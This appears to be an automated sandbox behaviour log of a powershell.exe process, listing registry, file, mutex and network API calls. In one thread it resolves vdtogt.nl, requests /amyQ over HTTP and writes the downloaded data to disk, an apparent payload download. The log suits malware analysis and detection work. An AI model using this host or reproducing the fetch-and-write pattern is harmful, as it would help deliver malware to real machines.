| File | Get Info | filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
9 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
6 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| File | Create | filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
62 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = System |
|
1 | |
| Registry | Open Key | reg_name = System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
8 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
Thread 0xa70
54
6
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
Thread 0xae8
77
53
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
22 | |
| Environment | Get Environment String | name = temp, result_out = C:\Users\BGC6U8~1\AppData\Local\Temp |
|
2 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
5 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
2 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Mutex | Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = vdtogt.nl, address_out = 62.204.93.18 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 62.204.93.18, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 63, size_out = 63 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = vdtogt.nl, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /amyQ |
|
1 | |
| Inet | Send HTTP Request | headers = host: vdtogt.nl, connection: Keep-Alive, url = vdtogt.nl/amyQ |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 564 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 564 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 40, size_out = 40 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = vdtogt.nl, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /amyQ/ |
|
1 | |
| Inet | Send HTTP Request | headers = host: vdtogt.nl, url = vdtogt.nl/amyQ/ |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 9044 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 9044 |
|
1 | |
| File | Write | size = 4096 |
|
1 | |
| File | Write | size = 8585 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3752 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 6468 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 6468 |
|
1 | |
| File | Write | size = 4096 |
|
1 | |
| File | Write | size = 6124 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 11680 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 11680 |
|
1 | |
| File | Write | size = 11680 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 24820 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 24820 |
|
1 | |
| File | Write | size = 24820 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3752 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 61948 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 61948 |
|
1 | |
| File | Write | size = 4096 |
|
1 | |
| File | Write | size = 61604 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 30547, size_out = 30547 |
|
1 | |
| Inet | Read Response | size = 30547, size_out = 30547 |
|
1 | |
| File | Write | size = 30547 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 2, size_out = 2 |
|
1 | |
| Inet | Read Response | size = 2, size_out = 2 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
| Inet | Read Response | size = 1, size_out = 1 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 1, size_out = 1 |
|
1 | |
